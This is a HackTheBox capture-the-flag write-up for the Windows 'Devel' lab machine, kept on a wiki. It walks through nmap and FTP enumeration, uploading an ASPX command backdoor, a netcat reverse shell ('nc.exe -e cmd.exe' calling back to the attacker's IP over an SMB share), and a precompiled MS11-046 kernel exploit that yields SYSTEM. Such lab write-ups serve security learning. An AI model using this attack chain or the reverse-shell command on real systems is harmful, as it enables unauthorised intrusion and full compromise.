imported>Aghanim at 21:58, 14 January 2022

2022-01-14T21:58:34Z

New page

{{Infobox WriteUp
| name = Devel
| platform = HackTheBox
| os = Windows
| difficulty = Easy
| techniques = FTP, IIS, Kernel Exploit
}}

[[File:2022-01-image-98.png|thumb]]

One my weakest link in penetration testing is Windows Privilege Escalation. I had alot of trouble escalating my privilege on this box. Anyways, this box had two ports open. Port '''21 '''and '''80'''. FTP allowed anonymous login, and it was writeable. FTP share pointed to the webservers location, so it would be possible to get reverse shell easily on this box. Rooting this was was easy aswell as there many missing KB's.

----

== Enumeration ==

I start with an NMAP scan. Here port 21 and port 80 were open. The webserver had nothing interesting on it. It just showed the default IIS webpage. But the interesting port here is FTP, which allow anonymous login.

<syntaxhighlight lang="bash">
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/devel]
└─# cat nmap.result
# Nmap 7.92 scan initiated Wed Jan 12 15:22:48 2022 as: nmap -sC -sV -p- --min-rate 10000 -oN nmap.result 10.10.10.5
Nmap scan report for 10.10.10.5
Host is up (0.054s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 01:06AM aspnet_client
| 03-17-17 04:37PM 689 iisstart.htm
|_03-17-17 04:37PM 184946 welcome.png
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jan 12 15:23:09 2022 -- 1 IP address (1 host up) scanned in 21.33 seconds
</syntaxhighlight>

=== FTP ===

Loggin in to '''FTP'''.

<syntaxhighlight lang="bash">

┌──(root💀kali)-[/home/aghanim/Desktop/HTB/devel]
└─# ftp 10.10.10.5 1 ⨯
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:aghanim): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17 01:06AM aspnet_client

03-17-17 04:37PM 689 iisstart.htm

03-17-17 04:37PM 184946 welcome.png
226 Transfer complete.

</syntaxhighlight>

=== Dir bruteforce - ferox ===

Nothing interesting in any of the DIRs. Doing a quick '''feroxbuster''' scan.

<syntaxhighlight lang="bash">
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/devel]
└─# feroxbuster --url http://10.10.10.5/aspnet_client --depth 3 -f

___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.4.1
───────────────────────────┬──────────────────────
🎯 Target Url │ http://10.10.10.5/aspnet_client
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.4.1
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🪓 Add Slash │ true
🔃 Recursion Depth │ 3
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403 29l 92w 1233c http://10.10.10.5/aspnet_client/system_web/
[####################] - 33s 59998/59998 0s found:1 errors:0
[####################] - 21s 29999/29999 1422/s http://10.10.10.5/aspnet_client
[####################] - 22s 29999/29999 1355/s http://10.10.10.5/aspnet_client/system_web/
</syntaxhighlight>

So it looks like the FTP is sharing the webserver location. We can try to upload a file to see if we have write permission.

<syntaxhighlight lang="bash">
ftp> put test.txt
local: test.txt remote: test.txt
200 PORT command successful.
150 Opening ASCII mode data connection.
226 Transfer complete.
ftp>

</syntaxhighlight>

Since we have write permission we could try and upload a backdoor to FTP. I'll use the backdoor which is located in Kali. /usr/share/davtest/backdoors/aspx_cmd.aspx, and visiting the website with '''/cmd.aspx. '''

[[File:2022-01-image-99.png|thumb]]

And we have command exection.

== Initial Access ==

=== impacket-smbserver.py ===

Since this is a Windows box, it does not have netcat natively installed. What we will do is setup an SMB share using '''impackets smbserver.py''', and share the '''nc.exe'''.

So first, create a share and start smbserver.py where nc.exe is located.

<syntaxhighlight lang="bash">
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/devel]
└─# smbserver.py share /home/aghanim/Desktop/HTB/devel
Impacket v0.9.25.dev1+20220105.151306.10e53952 - Copyright 2021 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

</syntaxhighlight>

No, start a '''netcat '''listener. I'll use '''rlwrap''' because this is a Windows.

From my previous TryHackMe notes:

>
rlwrap gives us access to history, tab autocompletion and the arrow keys immediately upon receiving a shell. Some manual stabilizaition must be utilised if you want to use ctrl+c. Not installed by default.

Syntax for rlwrap:

rlwrap nc -lvnp
This technique is very useful when dealing with Windows shells, as they tend to be very difficult to stabilize.
https://blog.aghanim.net/?p=1043

So we'll use the command. Execute this command on the webserver to give us reverse shell.

<syntaxhighlight lang="bash">
\\10.10.14.17\share\nc.exe -e cmd.exe 10.10.14.17 4444
</syntaxhighlight>

Looking at our listener we have a connection.

<syntaxhighlight lang="bash">
┌──(root💀kali)-[/home/aghanim]
└─# rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.17] from (UNKNOWN) [10.10.10.5] 49171
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

</syntaxhighlight>

=== Enumerate the machine ===

Doing some enumeration on the Windows box. Running the '''systeminfo '''command we get some information about the machine. So we know this is a Windows 7 box, its a x86 based, even though the CPU is x64, installed KBs is N/A. Thats interesting as there might be some vulnerabilites we could abuse.

<syntaxhighlight lang="bash">
systeminfo
systeminfo

Host Name: DEVEL
OS Name: Microsoft Windows 7 Enterprise
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: babis
Registered Organization:
Product ID: 55041-051-0948536-86302
Original Install Date: 17/3/2017, 4:17:31 ��
System Boot Time: 14/1/2022, 9:14:06 ��
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 3.071 MB
Available Physical Memory: 2.440 MB
Virtual Memory: Max Size: 6.141 MB
Virtual Memory: Available: 5.508 MB
Virtual Memory: In Use: 633 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Local Area Connection 3
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.5
[02]: fe80::58c0:f1cf:abc6:bb9e
[03]: dead:beef::24c

</syntaxhighlight>

Trying to list availabe KBs I couldnt find anything. Maybe no KBs have been installed

<syntaxhighlight lang="bash">
wmic qfe get Caption,Description,HotFixID,InstalledOn
No Instance(s) Available.

</syntaxhighlight>

There are also two users, '''Administrator '''and '''Babis. '''

<syntaxhighlight lang="bash">
net users

User accounts for \\

-------------------------------------------------------------------------------
Administrator babis Guest
The command completed with one or more errors.

</syntaxhighlight>

== Privilege Escalation ==

=== Watson ===

I will use '''[https://github.com/rasta-mouse/Watson rasta-mouse/watson] '''script to search for missing KBs and vulnerabilites. There are however a couple of things that needs to be done before we're able to run this scripts.

* The script is for Windows 10. There are however older commits for the watson script we could use. * We need to know the '''.NET '''version of the machine. * We need to compile Watson with the correct paramteres using Visual Studios. As I dont have that installed on my Kali, I'll use my Windows host.

=== Find the .NET version of the machine ===

So first, lets find out the .NET version of the machine. We can use this command.

<syntaxhighlight lang="bash">
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"

</syntaxhighlight>

And the output.

<syntaxhighlight lang="bash">
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v2.0.50727
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v3.0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v3.5

c:\windows\system32\inetsrv>
</syntaxhighlight>

=== Compile the correct version with Visual Studios ===

So this machine use '''.NET ver 3.5'''.

Download the [https://github.com/rasta-mouse/Watson/tree/efb7cfa547492e7b631cacc0db18bb0cfd2de3bd correct version of Watson]that allows us to run on Windows 7 and then open the '''Watson.sln '''in Visual Studios.

Go to Watson --> Properties and change the Target Framework to .NET Framework 3.5.

[[File:2022-01-image-100.png|thumb]]

Then, go to Build --> Configuration Manager and change the platform to x86.

[[File:2022-01-image-101.png|thumb]]

Lastely, go to Build --> Build Watson.

[[File:2022-01-image-102.png|thumb]]

And the output should be:

[[File:2022-01-image-103.png|thumb]]

I transferred the file to my Kali machine using python HTTP server, and as I did earlier with the '''nc.exe''', I'll do the same here.

<syntaxhighlight lang="bash">
\\10.10.14.17\share\Watson.exe
\\10.10.14.17\share\Watson.exe
__ __ _
/ / /\ \ \__ _| |_ ___ ___ _ __
\ \/ \/ / _` | __/ __|/ _ \| '_ \
\ /\ / (_| | |_\__ \ (_) | | | |
\/ \/ \__,_|\__|___/\___/|_| |_|

v0.1

Sherlock sucks...
@_RastaMouse

[*] OS Build number: 7600
[*] CPU Address Width: 32
[*] Processs IntPtr Size: 4
[*] Using Windows path: C:\WINDOWS\System32

[*] Appears vulnerable to MS10-073
[>] Description: Kernel-mode drivers load unspecified keyboard layers improperly, which result in arbitrary code execution in the kernel.
[>] Exploit: https://www.exploit-db.com/exploits/36327/
[>] Notes: None.

[*] Appears vulnerable to MS10-092
[>] Description: When processing task files, the Windows Task Scheduler only uses a CRC32 checksum to validate that the file has not been tampered with.Also, In a default configuration, normal users can read and write the task files that they have created.By modifying the task file and creating a CRC32 collision, an attacker can execute arbitrary commands with SYSTEM privileges.
[>] Exploit: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/ms10_092_schelevator.rb
[>] Notes: None.

[*] Appears vulnerable to MS11-046
[>] Description: The Ancillary Function Driver (AFD) in afd.sys does not properly validate user-mode input, which allows local users to elevate privileges.
[>] Exploit: https://www.exploit-db.com/exploits/40564/
[>] Notes: None.

[*] Appears vulnerable to MS12-042
[>] Description: An EoP exists due to the way the Windows User Mode Scheduler handles system requests, which can be exploited to execute arbitrary code in kernel mode.
[>] Exploit: https://www.exploit-db.com/exploits/20861/
[>] Notes: None.

[*] Appears vulnerable to MS13-005
[>] Description: Due to a problem with isolating window broadcast messages in the Windows kernel, an attacker can broadcast commands from a lower Integrity Level process to a higher Integrity Level process, thereby effecting a privilege escalation.
[>] Exploit: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb
[>] Notes: None.

[*] Finished. Found 5 vulns :)

c:\windows\system32\inetsrv>
</syntaxhighlight>

=== MS11-046 ===

Right off the bat I can see there is a privilege escalation vulnerability on this machine.

'' Description: The Ancillary Function Driver (AFD) in afd.sys does not properly validate user-mode input, which allows local users to elevate privileges. ''

I used [https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS11-046 Windows-Kernel-exploits] precompiled exe file and ran it on the target machine.

<syntaxhighlight lang="bash">
\\10.10.14.17\share\MS11-046.exe
\\10.10.14.17\share\MS11-046.exe

whoami
whoami
nt authority\system

</syntaxhighlight>

== What I've learned ==

* Always enumerate harder as they say. Try not to assume to much and instead get verification that the system is vulnerable.* Not all scripts will work out of the box. Some will have to be tweaked to work on ther target machine. * When compiling scripts for Windows, always check target OS architecture. * rlwrap is better to use than netcat when target is Windows. * I really need to build a good methodology.

[[Category:HackTheBox]]
[[Category:Windows]]
[[Category:Write-ups]]

Write-ups/HTB/Devel - Revision history

imported>Aghanim at 21:58, 14 January 2022